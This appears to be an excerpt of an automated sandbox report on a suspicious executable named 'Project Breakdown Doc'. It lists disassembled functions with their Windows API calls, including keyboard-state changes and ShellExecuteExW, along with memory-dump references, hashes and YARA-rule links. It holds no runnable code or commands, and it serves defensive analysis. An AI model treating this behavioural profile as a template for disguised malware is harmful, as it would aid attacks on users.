                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00CA32C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: 5e6e160019c0cf241bd30fb61ed79bde7724e1252ad7790178bbcfc33f5b5b36
                                                  • Instruction ID: 993eff35c5ab1480d91242479a9312eedc7da2ae76af30d2dec62a23406ba232
                                                  • Opcode Fuzzy Hash: 5e6e160019c0cf241bd30fb61ed79bde7724e1252ad7790178bbcfc33f5b5b36
                                                  • Instruction Fuzzy Hash: 6A112B313083CBBBA7115B55DCA3EAEB79CDF1B378F20012AF614961C3D6616B4055A5
                                                  Function 00CA4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CA454E
                                                  • LoadStringW.USER32(00000000), ref: 00CA4555
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CA456B
                                                  • LoadStringW.USER32(00000000), ref: 00CA4572
                                                  • _wprintf.LIBCMT ref: 00CA4598
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA45B6
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00CA4593
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 8d67be63a83a22c7ec035aa6c90f43f55af19311e32fb01222aee18afc1e70ae
                                                  • Instruction ID: 7d7ae9a9826768dda4af17838097deb65b89ce21bc471776fa651ccd92a8e575
                                                  • Opcode Fuzzy Hash: 8d67be63a83a22c7ec035aa6c90f43f55af19311e32fb01222aee18afc1e70ae
                                                  • Instruction Fuzzy Hash: 16014FF2900208BFE750A7A0DD89FEA776DD708301F0005A9FB45D2051EA749E868B75
                                                  Function 00CCD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00CCD78A
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00CCD7AA
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CCD9E5
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CCDA03
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CCDA24
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00CCDA43
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCDA68
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CCDA8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: a61219c99166bfd43349a7e7e0b360233160917a3f4ec04ee94ae45d55c30c38
                                                  • Instruction ID: 7f6824192e864f19fd56cf15f9d8ba25c2d61768446141f5e6a6b46edab3290a
                                                  • Opcode Fuzzy Hash: a61219c99166bfd43349a7e7e0b360233160917a3f4ec04ee94ae45d55c30c38
                                                  • Instruction Fuzzy Hash: 8EB18935600225EBDF14CF69C9C5BBD7BB1BF04701F08807DEC5A9A295DB34AA90DBA0
                                                  Function 00C42A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C42ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000,000000FF), ref: 00C42B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C7C46A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C7C4D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: e8fd581db41b2035064d5d2c2ccf87c4c41bf0f8c34b6ad1dbfa7e3d38271cf6
                                                  • Instruction ID: 9070c6e8bb69361363cfe7d45ffaf2e7aa0d182c6a74da4cc807d53753e704e4
                                                  • Opcode Fuzzy Hash: e8fd581db41b2035064d5d2c2ccf87c4c41bf0f8c34b6ad1dbfa7e3d38271cf6
                                                  • Instruction Fuzzy Hash: 82412A312087809BC7358B29DCDEB7B7BA2FB95300F98C81DF86B86560C6759946F721
                                                  Function 00CA7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CA737F
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CA73B6
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00CA73D2
                                                  • _memmove.LIBCMT ref: 00CA7420
                                                  • _memmove.LIBCMT ref: 00CA743D
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00CA744C
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CA7461
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA7480
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 7ac7193605053e008ce6d782000fe1b1a912747bc317bdf76005e68cbeebcaf0
                                                  • Instruction ID: fe6e726181b2b39bee63fb07c5895f759a24aafb164a6a9b3f1c466f50f74652
                                                  • Opcode Fuzzy Hash: 7ac7193605053e008ce6d782000fe1b1a912747bc317bdf76005e68cbeebcaf0
                                                  • Instruction Fuzzy Hash: 56317C71904205EBCF10DFA4DC85FAFBBB8FF45710B1841A9F904AB256DB309A15DBA1
                                                  Function 00CC6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00CC645A
                                                  • GetDC.USER32(00000000), ref: 00CC6462
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC646D
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00CC6479
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CC64B5
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC64C6
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CC9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC6500
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC6520
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 8bc86d3442dfead43dcd43112bafb8207aaab92e3b90bfea8b5509453f67cc79
                                                  • Instruction ID: c902ed91f03741f0d9f88ecd1b432ded5348eee9c9066dae3d9abdcf00613fb5
                                                  • Opcode Fuzzy Hash: 8bc86d3442dfead43dcd43112bafb8207aaab92e3b90bfea8b5509453f67cc79
                                                  • Instruction Fuzzy Hash: BA317F72201214BFEB118F50CD4AFEA3FAAEF09761F044069FE089A291D6759D42CB74
                                                  Function 00C9C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: b41ef96ee1f7ef5bbc26e62610dda712824fc8bc1d3c45c18d1623735aa8b5b4
                                                  • Instruction ID: 263e9d0fbc2241d00117fd33425ba890f40daa245d8fbbea2b283ab1198a848a
                                                  • Opcode Fuzzy Hash: b41ef96ee1f7ef5bbc26e62610dda712824fc8bc1d3c45c18d1623735aa8b5b4
                                                  • Instruction Fuzzy Hash: F0219F75601205BBEA24A521CDCAFAF239DEF60395F0C5021FE0596382E791DF11D2B5
                                                  Function 00CAED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • _wcstok.LIBCMT ref: 00CAEEFF
                                                  • _wcscpy.LIBCMT ref: 00CAEF8E
                                                  • _memset.LIBCMT ref: 00CAEFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: 3eb12f283f4a60550f434db708fb03e184aa7ec7ae3a31cca9b6c72134da8189
                                                  • Instruction ID: 7f2c6018161e6e9fc16c1806076d0eb21b274088609f10a31d3f18c955e3c738
                                                  • Opcode Fuzzy Hash: 3eb12f283f4a60550f434db708fb03e184aa7ec7ae3a31cca9b6c72134da8189
                                                  • Instruction Fuzzy Hash: 75C18D715083019FCB24EF64C885A6EB7E4FF85314F04492DF99A9B2A2DB30ED45DB82
                                                  Function 00C41424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da1c66e86c4ecb278b989b3c2bbdcdf349f47f331fbdc6029b86b97ece8f735b
                                                  • Instruction ID: df732fcf27332abfe67a3e7c6214d69008d02e6fcf5ae7de336ca65d2fbf471b
                                                  • Opcode Fuzzy Hash: da1c66e86c4ecb278b989b3c2bbdcdf349f47f331fbdc6029b86b97ece8f735b
                                                  • Instruction Fuzzy Hash: 2A716C30900109EFCB14CF99CC49EBEBBB9FF85310F188159F965AA251C730AA91DBA0
                                                  Function 00CB6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0548a252a2625a02dc580d264c90558bcfde254f3d347f53eee68a8ea16c09a3
                                                  • Instruction ID: aa94dd3995f2d4ae9aaa2202ffef3d7c51fdc3987078b238e4825480ec043a7d
                                                  • Opcode Fuzzy Hash: 0548a252a2625a02dc580d264c90558bcfde254f3d347f53eee68a8ea16c09a3
                                                  • Instruction Fuzzy Hash: 1461AC71508300ABC720EB24DC86FAFB7E9EF84714F144A1DF956972A2DB709E05D792
                                                  Function 00CCB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(017A55B0), ref: 00CCB6A5
                                                  • IsWindowEnabled.USER32(017A55B0), ref: 00CCB6B1
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CCB795
                                                  • SendMessageW.USER32(017A55B0,000000B0,?,?), ref: 00CCB7CC
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00CCB809
                                                  • GetWindowLongW.USER32(017A55B0,000000EC), ref: 00CCB82B
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CCB843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 008b5fd4b68384203f94c0f6ef6038b2870e0e2ea817859ac7805cf3a03cd1a6
                                                  • Instruction ID: 585aa504a51a04cf89f16a2c56deff9e5b5c818cc9056293bc17079e6a05a855
                                                  • Opcode Fuzzy Hash: 008b5fd4b68384203f94c0f6ef6038b2870e0e2ea817859ac7805cf3a03cd1a6
                                                  • Instruction Fuzzy Hash: 92718E34600204EFDB259FA4C896FAABBB9FF89300F14406DF965973A1C731AE51DB60
                                                  Function 00CBF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CBF75C
                                                  • _memset.LIBCMT ref: 00CBF825
                                                  • ShellExecuteExW.SHELL32(?), ref: 00CBF86A
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00CBF8E1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CBF910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: c86caff59023e75af4b825f39cdf7bd5d85c38389c0bc513b34745c83ef85dd7
                                                  • Instruction ID: 32a3540f00fc521c250bb0e9b55c16d77cdd2c09b23dedc8ebc6ee372703016d
                                                  • Opcode Fuzzy Hash: c86caff59023e75af4b825f39cdf7bd5d85c38389c0bc513b34745c83ef85dd7
                                                  • Instruction Fuzzy Hash: D1618F75A006199FCF14DF54C881AAEBBF5FF49310F14846DE85AAB391CB31AE42DB90
                                                  Function 00CA145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00CA149C
                                                  • GetKeyboardState.USER32(?), ref: 00CA14B1
                                                  • SetKeyboardState.USER32(?), ref: 00CA1512
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CA1540
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CA155F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CA15A5
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CA15C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: e6f6aa89aaf56fdbe9203c7501b80e81de456001f5d83cde19f1a3c762505f85
                                                  • Instruction ID: e01a781f8ccc11ded358b0496423d4ff7edffb12ebba124d56288a3e93d3781c
                                                  • Opcode Fuzzy Hash: e6f6aa89aaf56fdbe9203c7501b80e81de456001f5d83cde19f1a3c762505f85
                                                  • Instruction Fuzzy Hash: DC51D3A0A047D73EFB364638CC49BBA7EE95B47308F0C8489F9E5868C2C294DE84D750
                                                  Function 00CA1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00CA12B5
                                                  • GetKeyboardState.USER32(?), ref: 00CA12CA
                                                  • SetKeyboardState.USER32(?), ref: 00CA132B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CA1357
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CA1374
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CA13B8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CA13D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: bd86c00605863efbc7cdda201ba910e50110a9ebf997a2c2d664d9387762ca1f
                                                  • Instruction ID: a73d78d4fde0c02d5bb5ec03f28b59992f78f58e5cb324e892c433a0cf293de9
                                                  • Opcode Fuzzy Hash: bd86c00605863efbc7cdda201ba910e50110a9ebf997a2c2d664d9387762ca1f
                                                  • Instruction Fuzzy Hash: B85104A05057D73DFB328B258C45B7ABFA95B07308F0C8589E9E48A8D2D395EE84E750
                                                  Function 00CA589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: c99df3ef6a6cb5ce4eaa31fe00654302cdbbb134959a8949def1ff80f58ee5fe
                                                  • Instruction ID: 95dd652c89cfeb0b7b7240c76e1481fa4bc142cfffbdad708e1f3081eb63051f
                                                  • Opcode Fuzzy Hash: c99df3ef6a6cb5ce4eaa31fe00654302cdbbb134959a8949def1ff80f58ee5fe
                                                  • Instruction Fuzzy Hash: 3B419465D205287ACB21EBB4CCC69CFB3A8AF05310F508566F518E3261F734E716D7A5
